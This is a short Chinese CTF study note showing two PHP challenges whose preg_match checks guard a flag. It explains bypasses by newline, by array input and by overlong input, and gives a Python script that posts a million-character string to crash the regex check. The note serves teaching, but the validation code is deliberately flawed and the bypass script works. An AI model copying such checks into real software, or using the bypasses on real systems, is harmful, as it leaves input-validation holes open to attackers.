1. 例题一
<?php
show_source(__FILE__);
function areyouok($greeting){
return preg_match('/$Merry.*Christmas/is',$greeting);
}
$greeting=@$_REQUEST['greeting'];
if(!areyouok($greeting)){
if(strpos($greeting,'Merry Christmas')!==false){
echo 'Merry Christmas. '.'flag{xxxxxx}';
}else{
echo 'Do you know .swp file?';
}
}else{
echo 'Do you know PHP?';
}
?>
开头是 $。可以用换行来绕过。
也可以用数组来绕过的
preg_match只能处理字符串,当传入的是数组时将会返回false。
2. 例题二
<?php
function areyouok($greeting){
return preg_match('/Merry.*Christmas/is',$greeting);
}
$greeting=@$_REQUEST['greeting'];
if(!is_array($greeting)){
if(!areyouok($greeting)){
if(strpos($greeting,'Merry Christmas')!==false){
echo 'Merry Christmas. '.'flag{xxxxxx}';
}else{
echo 'Do you know .swp file?';
}
}else{
echo 'Do you know PHP?';
}
}
?>
这个多余的字符,在后面哪里都行, 使得preg_match()崩溃就好
同样 python脚本一样可以:
import requests
url = "http://localhost/test1.php"
data={
"greeting":"Merry Christmas"+"a"*1000000}
response = requests.post(url=url,data=data)
print(response.text)